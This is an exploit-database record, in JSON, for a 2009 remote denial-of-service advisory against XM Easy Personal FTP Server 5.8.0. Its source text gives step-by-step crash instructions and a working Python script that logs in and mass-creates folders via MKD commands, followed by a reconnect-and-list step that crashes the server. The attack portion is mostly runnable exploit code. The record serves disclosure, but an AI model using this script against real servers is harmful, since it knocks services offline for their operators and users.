XM Easy Personal FTP Server 5.8.0 - Remote Denial of Service
{"lastseen": "2020-04-01T19:05:27", "references": [], "description": "\nXM Easy Personal FTP Server 5.8.0 - Remote Denial of Service", "edition": 1, "reporter": "leinakesi", "exploitpack": {"type": "dos", "platform": "windows"}, "published": "2009-11-24T00:00:00", "title": "XM Easy Personal FTP Server 5.8.0 - Remote Denial of Service", "type": "exploitpack", "enchantments": {"dependencies": {}, "score": {"value": 0.5, "vector": "NONE"}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.5}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2009-11-24T00:00:00", "id": "EXPLOITPACK:1D750982050E4C0E41589A47080EB23E", "href": "", "viewCount": 3, "sourceData": "Date of Discovery: 24-Nov-2009\n\nCredits:leinakesi[at]gmail.com\n\nVendor: Dxmsoft\n*******************************************************************************\nAffected:\n\n XM Easy Personal FTP Server 5.8.0\n Earlier versions may also be affected\n*******************************************************************************\nOverview:\n\n XM Easy Personal FTP Server failed to handle more than 2000 files or folders in the root directory.\n*******************************************************************************\nDetails:\n\n If you can log on to the server, take the following steps and the server will crash, which leads to DoS.\n \n 1.upload 2000 files or folders.\n 2.close the current connection.\n 3.use a ftp client to reconnect the server.\n user ...\n pass ...\n port ...\n list ...\n crash!!!!!!\n*******************************************************************************\nExploit example:\n\n1.upload 2000 folders.\n#!/usr/bin/python\nimport socket\nimport sys\n\ndef Usage():\n print (\"Usage: ./expl.py <serv_ip> <Username> <password>\\n\")\n print (\"Example:./expl.py 192.168.48.183 anonymous anonymous\\n\")\nif len(sys.argv) <> 4:\n Usage()\n sys.exit(1)\nelse:\n hostname=sys.argv[1]\n username=sys.argv[2]\n passwd=sys.argv[3]\n test_string='a'\n sock = 
socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n try:\n sock.connect((hostname, 21))\n except:\n print (\"Connection error!\")\n sys.exit(1)\n r=sock.recv(1024)\n sock.send(\"user %s\\r\\n\" %username)\n r=sock.recv(1024)\n sock.send(\"pass %s\\r\\n\" %passwd)\n\n for i in range(1,200):\n sock.send(\"mkd \" + \"a\" * i +\"\\r\\n\")\n print \"[-] \" + (\"mkd \" + \"a\" * i +\"\\r\\n\")\n r=sock.recv(1024)\n print \"[+] \" + r + \"\\r\\n\"\n for i in range(1,200):\n sock.send(\"mkd \" + \"b\" * i +\"\\r\\n\")\n print \"[-] \" + (\"mkd \" + \"b\" * i +\"\\r\\n\")\n r=sock.recv(1024)\n print \"[+] \" + r + \"\\r\\n\"\n for i in range(1,200):\n sock.send(\"mkd \" + \"c\" * i +\"\\r\\n\")\n print \"[-] \" + (\"mkd \" + \"c\" * i +\"\\r\\n\")\n r=sock.recv(1024)\n print \"[+] \" + r + \"\\r\\n\"\n for i in range(1,200):\n sock.send(\"mkd \" + \"d\" * i +\"\\r\\n\")\n print \"[-] \" + (\"mkd \" + \"d\" * i +\"\\r\\n\")\n r=sock.recv(1024)\n print \"[+] \" + r + \"\\r\\n\"\n for i in range(1,200):\n sock.send(\"mkd \" + \"e\" * i +\"\\r\\n\")\n print \"[-] \" + (\"mkd \" + \"e\" * i +\"\\r\\n\")\n r=sock.recv(1024)\n print \"[+] \" + r + \"\\r\\n\"\n for i in range(1,200):\n sock.send(\"mkd \" + \"f\" * i +\"\\r\\n\")\n print \"[-] \" + (\"mkd \" + \"f\" * i +\"\\r\\n\")\n r=sock.recv(1024)\n print \"[+] \" + r + \"\\r\\n\"\n for i in range(1,200):\n sock.send(\"mkd \" + \"g\" * i +\"\\r\\n\")\n print \"[-] \" + (\"mkd \" + \"g\" * i +\"\\r\\n\")\n r=sock.recv(1024)\n print \"[+] \" + r + \"\\r\\n\"\n for i in range(1,200):\n sock.send(\"mkd \" + \"h\" * i +\"\\r\\n\")\n print \"[-] \" + (\"mkd \" + \"h\" * i +\"\\r\\n\")\n r=sock.recv(1024)\n print \"[+] \" + r + \"\\r\\n\"\n for i in range(1,200):\n sock.send(\"mkd \" + \"i\" * i +\"\\r\\n\")\n print \"[-] \" + (\"mkd \" + \"i\" * i +\"\\r\\n\")\n r=sock.recv(1024)\n print \"[+] \" + r + \"\\r\\n\"\n for i in range(1,200):\n sock.send(\"mkd \" + \"j\" * i +\"\\r\\n\")\n print \"[-] \" + (\"mkd \" + \"j\" * i 
+\"\\r\\n\")\n r=sock.recv(1024)\n print \"[+] \" + r + \"\\r\\n\"\n\n sock.close()\n sys.exit(0);\n\n2.use a ftp client to reconnect the server\nfor example:\nstart->run->cmd->ftp 127.0.0.1->*****->*****->dir", "cvss": {"score": 0.0, "vector": "NONE"}, "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645749427, "score": 1659814272}, "_internal": {"score_hash": "936522561c34a0398d661307eb3ee4a9"}}